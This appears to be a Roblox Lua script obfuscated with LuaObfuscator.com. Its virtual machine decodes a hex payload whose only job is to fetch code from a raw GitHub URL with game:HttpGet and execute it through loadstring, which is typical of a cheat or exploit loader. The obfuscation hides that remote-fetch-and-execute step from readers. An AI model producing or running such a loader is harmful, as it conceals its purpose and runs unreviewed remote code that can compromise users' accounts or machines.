--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v87=v5(v82,v19);v19=nil;return v87;else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + 1)) ;return v83-(v83%(932 -(857 + 74))) ;else local v84=((143 + 427) -(367 + 32 + 169))^(v32-1) ;return (((v31%(v84 + v84))>=v84) and (928 -(214 + 713))) or 0 ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (879 -(282 + 595)) );v18=v18 + (1639 -(1523 + 114)) ;return (v36 * (231 + 25)) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + ((120 -(32 + 85)) -0) );v18=v18 + (1069 -(68 + 997)) ;return (v40 * (16778486 -(226 + 1044))) + (v39 * 65536) + (v38 * ((1092 + 22) -858)) + v37 ;end local function v24()local v41=0 + 0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==0) then v42=v23();v43=v23();v41=(1749 -(368 + 423)) -(892 + 65) ;end if (v41==(7 -4)) then if (v46==(0 -0)) then if (v45==(0 -0)) then return v47 * ((1099 -749) -((105 -(10 + 8)) + 263)) ;else v46=181 -(67 + 113) ;v44=(0 -0) + 0 ;end elseif (v46==((5467 -(416 + 26)) -2978)) then return ((v45==(0 + 0)) and (v47 * ((3 -2)/0))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/(2^52))) ;end if (v41==(954 -((2560 -1758) + 150))) then v46=v20(v43,56 -35 ,55 -24 );v47=((v20(v43,24 + 4 + 4 )==(998 -((1618 -703) + 82))) and  -(2 -1)) or (1 + (438 -(145 + 293))) ;v41=3 -0 ;end if (v41==(1188 -(1069 + 118))) then v44=2 -1 ;v45=(v20(v43,1,43 -23 ) * ((1 + 1)^(56 -24))) + v42 ;v41=2 + 0 ;end end end local function v25(v48)local v49=430 -(44 + 386) ;local v50;local v51;while true do if (v49==(1489 -(998 + 488))) then return v6(v51);end if (v49==((2 -1) + 1)) then v51={};for v88=1 + 0 , #v50 do v51[v88]=v2(v1(v3(v50,v88,v88)));end v49=775 -(11 + 190 + 571) ;end if (v49==(1138 -(116 + 1022))) then v50=nil;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=1 + 0 ;end if (v49==((2 + 1) -2)) then v50=v3(v16,v18,(v18 + v48) -(3 -2) );v18=v18 + v48 ;v49=861 -((1699 -(261 + 624)) + 45) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v52~=2) then else v57=nil;v58=nil;v52=3 -0 ;end if (v52==(17 -13)) then v61=nil;while true do if (v53==(1449 -(1290 + 155))) then while true do if (v54~=(0 -0)) then else local v100=0;local v101;while true do if (v100==(0 + 0)) then v101=0 -0 ;while true do if (v101==(66 -(30 + 35))) then v54=1;break;end if (v101==(0 + 0)) then local v133=1257 -(1043 + 214) ;while true do if (v133~=(3 -2)) then else v101=1213 -(323 + 889) ;break;end if (v133~=0) then else v55=0;v56=nil;v133=1;end end end end break;end end end if (v54~=3) then else v61=nil;while true do local v106=0 -0 ;local v107;while true do if (v106==0) then v107=580 -(361 + 219) ;while true do if (v107~=(321 -(53 + 267))) then else if (1~=v55) then else local v160=0;local v161;local v162;while true do if (v160~=(1 + 0)) then else while true do if (v161==0) then v162=413 -(15 + 398) ;while true do if (v162==2) then v55=2;break;end if ((983 -(18 + 964))~=v162) then else local v167=0 -0 ;local v168;while true do if (0==v167) then v168=0 + 0 ;while true do if ((0 + 0)==v168) then for v178=851 -(20 + 830) ,v60 do local v179=0 + 0 ;local v180;local v181;local v182;while true do if ((127 -(116 + 10))==v179) then v182=nil;while true do if (v180~=1) then else if (v181==(1 + 0)) then v182=v21()~=(738 -(542 + 196)) ;elseif (v181==2) then v182=v24();elseif (v181==(6 -3)) then v182=v25();end v61[v178]=v182;break;end if (v180~=(0 + 0)) then else local v193=0 + 0 ;local v194;while true do if (v193~=0) then else v194=0 + 0 ;while true do if (v194==(0 -0)) then local v196=0;while true do if (v196~=(2 -1)) then else v194=1;break;end if (v196~=0) then else v181=v21();v182=nil;v196=1552 -(1126 + 425) ;end end end if (v194~=1) then else v180=406 -(118 + 287) ;break;end end break;end end end end break;end if (v179==0) then local v183=0 -0 ;while true do if (v183==(1122 -(118 + 1003))) then v179=2 -1 ;break;end if (v183==(377 -(142 + 235))) then v180=0;v181=nil;v183=4 -3 ;end end end end end v59[1 + 2 ]=v21();v168=978 -(553 + 424) ;end if (v168~=1) then else v162=2;break;end end break;end end end if (0~=v162) then else local v169=0;local v170;while true do if (v169==0) then v170=0 -0 ;while true do if (v170==1) then v162=1 + 0 ;break;end if (v170~=(0 + 0)) then else local v176=0;while true do if (v176~=1) then else v170=1;break;end if (v176==0) then v60=v23();v61={};v176=1 + 0 ;end end end end break;end end end end break;end end break;end if (v160~=0) then else v161=0 + 0 ;v162=nil;v160=1 + 0 ;end end end break;end if ((0 -0)~=v107) then else local v141=0 -0 ;while true do if (v141~=0) then else if (v55==(4 -2)) then local v163=0 + 0 ;local v164;while true do if (v163~=(0 -0)) then else v164=0;while true do if (v164~=0) then else local v171=0;local v172;while true do if (v171==(753 -(239 + 514))) then v172=0 + 0 ;while true do if (v172~=1) then else v164=1330 -(797 + 532) ;break;end if (v172~=(0 + 0)) then else local v177=0 + 0 ;while true do if (v177~=0) then else for v184=1,v23() do local v185=0;local v186;local v187;local v188;local v189;while true do if (v185==1) then v188=nil;v189=nil;v185=2;end if (v185~=(4 -2)) then else while true do if (v186~=1) then else v189=nil;while true do if (v187~=(1202 -(373 + 829))) then else local v197=0;local v198;while true do if (v197~=0) then else v198=731 -(476 + 255) ;while true do if (v198==(1131 -(369 + 761))) then v187=1 + 0 ;break;end if (0==v198) then local v204=0;while true do if (0==v204) then v188=0;v189=nil;v204=1;end if ((1 -0)==v204) then v198=1;break;end end end end break;end end end if (v187~=1) then else while true do if (0==v188) then v189=v21();if (v20(v189,1,1)~=(0 -0)) then else local v199=0;local v200;local v201;local v202;local v203;while true do if (v199~=(238 -(64 + 174))) then else local v205=0 + 0 ;while true do if ((1 -0)==v205) then v199=337 -(144 + 192) ;break;end if (v205==(216 -(42 + 174))) then v200=0;v201=nil;v205=1;end end end if (v199==(1 + 0)) then v202=nil;v203=nil;v199=2 + 0 ;end if ((1 + 1)==v199) then while true do if (v200~=1) then else local v206=0;local v207;local v208;while true do if (v206==(1504 -(363 + 1141))) then v207=1580 -(1183 + 397) ;v208=nil;v206=1;end if (v206~=(2 -1)) then else while true do if (v207==0) then v208=0 + 0 ;while true do if (v208~=(0 + 0)) then else local v218=1975 -(1913 + 62) ;local v219;while true do if (v218==(0 + 0)) then v219=0;while true do if (v219==(0 -0)) then v203={v22(),v22(),nil,nil};if (v201==(1661 -(1477 + 184))) then local v224=0;while true do if (v224==0) then v203[3 -0 ]=v22();v203[4]=v22();break;end end elseif (v201==(1 + 0)) then v203[859 -(564 + 292) ]=v23();elseif (v201==(2 -0)) then v203[3]=v23() -((5 -3)^(320 -(244 + 60))) ;elseif (v201~=(3 + 0)) then else local v229=476 -(41 + 435) ;local v230;while true do if (v229==0) then v230=1001 -(938 + 63) ;while true do if (v230==(0 + 0)) then v203[3]=v23() -(2^(1141 -(936 + 189))) ;v203[2 + 2 ]=v22();break;end end break;end end end v219=1614 -(1565 + 48) ;end if (v219~=1) then else v208=1;break;end end break;end end end if (v208==(1 + 0)) then v200=2;break;end end break;end end break;end end end if (v200~=(1140 -(782 + 356))) then else local v209=267 -(176 + 91) ;local v210;while true do if (v209==(0 -0)) then v210=0 -0 ;while true do if (v210~=(1092 -(975 + 117))) then else local v216=0;while true do if (v216==(1875 -(157 + 1718))) then if (v20(v202,1,1)==1) then v203[2]=v61[v203[2]];end if (v20(v202,2 + 0 ,6 -4 )~=1) then else v203[10 -7 ]=v61[v203[3]];end v216=1019 -(697 + 321) ;end if (v216==1) then v210=1;break;end end end if (v210~=(2 -1)) then else v200=3;break;end end break;end end end if (v200==(5 -2)) then if (v20(v202,6 -3 ,3)~=1) then else v203[4]=v61[v203[2 + 2 ]];end v56[v184]=v203;break;end if (v200==0) then local v212=0;local v213;while true do if (0==v212) then v213=0 -0 ;while true do if (v213==0) then local v217=0;while true do if (v217~=(0 -0)) then else v201=v20(v189,1229 -(322 + 905) ,614 -(602 + 9) );v202=v20(v189,1193 -(449 + 740) ,6);v217=873 -(826 + 46) ;end if (v217==1) then v213=1;break;end end end if (v213~=1) then else v200=1;break;end end break;end end end end break;end end end break;end end break;end end break;end if (v186~=(947 -(245 + 702))) then else local v195=0 -0 ;while true do if (v195==0) then v187=0;v188=nil;v195=1 + 0 ;end if (v195==(1899 -(260 + 1638))) then v186=441 -(382 + 58) ;break;end end end end break;end if (v185==0) then v186=0;v187=nil;v185=3 -2 ;end end end for v190=1 + 0 ,v23() do v57[v190-1 ]=v28();end v177=1 -0 ;end if (v177~=(2 -1)) then else v172=1206 -(902 + 303) ;break;end end end end break;end end end if ((1 -0)==v164) then return v59;end end break;end end end if (v55==0) then local v165=0 -0 ;local v166;while true do if (v165~=(0 + 0)) then else v166=0;while true do if (v166~=(1691 -(1121 + 569))) then else local v173=214 -(22 + 192) ;local v174;while true do if (v173==0) then v174=683 -(483 + 200) ;while true do if (v174~=1) then else v166=2;break;end if ((1463 -(1404 + 59))~=v174) then else v58={};v59={v56,v57,nil,v58};v174=766 -(468 + 297) ;end end break;end end end if (v166~=0) then else v56={};v57={};v166=1;end if (v166~=(564 -(334 + 228))) then else v55=3 -2 ;break;end end break;end end end v141=1;end if ((2 -1)~=v141) then else v107=1 -0 ;break;end end end end break;end end end break;end if (v54==(1 + 1)) then local v102=0;local v103;while true do if (v102==0) then v103=0;while true do if (v103==(237 -(141 + 95))) then v54=3;break;end if (v103~=0) then else local v134=0 + 0 ;while true do if ((2 -1)~=v134) then else v103=1;break;end if (v134~=(0 -0)) then else v59=nil;v60=nil;v134=1 + 0 ;end end end end break;end end end if (v54==(2 -1)) then local v104=0 + 0 ;local v105;while true do if (v104==0) then v105=0;while true do if (1==v105) then v54=2 + 0 ;break;end if (v105~=0) then else v57=nil;v58=nil;v105=1 -0 ;end end break;end end end end break;end if (v53==0) then local v96=0 + 0 ;while true do if (v96==0) then v54=163 -(92 + 71) ;v55=nil;v96=1 + 0 ;end if (v96~=1) then else v53=1;break;end end end if (v53~=1) then else local v97=0;while true do if (v97==1) then v53=2;break;end if (v97~=(0 -0)) then else v56=nil;v57=nil;v97=766 -(574 + 191) ;end end end if (v53~=2) then else local v98=0;while true do if (v98==(0 + 0)) then v58=nil;v59=nil;v98=1;end if (v98~=(2 -1)) then else v53=2 + 1 ;break;end end end if (v53==(852 -(254 + 595))) then local v99=0;while true do if (v99==(126 -(55 + 71))) then v60=nil;v61=nil;v99=1;end if (v99~=1) then else v53=5 -1 ;break;end end end end break;end if ((1790 -(573 + 1217))~=v52) then else v53=0;v54=nil;v52=2 -1 ;end if (v52==1) then v55=nil;v56=nil;v52=2;end if (v52==(1 + 2)) then v59=nil;v60=nil;v52=5 -1 ;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v85=0,v76 do if (v85>=v70) then v74[v85-v70 ]=v75[v85 + 1 ];else v78[v85]=v75[v85 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v86=0;while true do if (v86==0) then v80=v68[v72];v81=v80[1];v86=1;end if (v86==1) then if (v81<=6) then if (v81<=2) then if (v81<=0) then v78[v80[2]]();elseif (v81>1) then v78[v80[2]]();else local v110=0;local v111;local v112;while true do if (v110==0) then v111=v80[2];v112=v78[v80[3]];v110=1;end if (v110==1) then v78[v111 + 1 ]=v112;v78[v111]=v112[v80[4]];break;end end end elseif (v81<=4) then if (v81==3) then do return;end else v78[v80[2]]=v80[3];end elseif (v81==5) then local v115=0;local v116;while true do if (v115==0) then v116=v80[2];v78[v116]=v78[v116](v13(v78,v116 + 1 ,v73));break;end end elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end elseif (v81<=9) then if (v81<=7) then v78[v80[2]]=v80[3];elseif (v81>8) then local v117=v80[2];v78[v117]=v78[v117](v13(v78,v117 + 1 ,v73));else local v119=0;local v120;local v121;while true do if (v119==1) then v78[v120 + 1 ]=v121;v78[v120]=v121[v80[4]];break;end if (v119==0) then v120=v80[2];v121=v78[v80[3]];v119=1;end end end elseif (v81<=11) then if (v81>10) then do return;end elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end elseif (v81>12) then local v122=0;local v123;local v124;local v125;local v126;while true do if (v122==1) then v73=(v125 + v123) -1 ;v126=0;v122=2;end if (v122==0) then v123=v80[2];v124,v125=v71(v78[v123](v13(v78,v123 + 1 ,v80[3])));v122=1;end if (v122==2) then for v155=v123,v73 do v126=v126 + 1 ;v78[v155]=v124[v126];end break;end end else local v127=v80[2];local v128,v129=v71(v78[v127](v13(v78,v127 + 1 ,v80[3])));v73=(v129 + v127) -1 ;local v130=0;for v131=v127,v73 do local v132=0;while true do if (v132==0) then v130=v130 + 1 ;v78[v131]=v128[v130];break;end end end end v72=v72 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403373O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F424F2O534A4B4C322F4E6577562F6D61696E2F4E7600083O0012063O00013O001206000100023O002001000100010003001204000300044O000C000100034O00095O00022O00023O000100012O00033O00017O00",v9(),...);
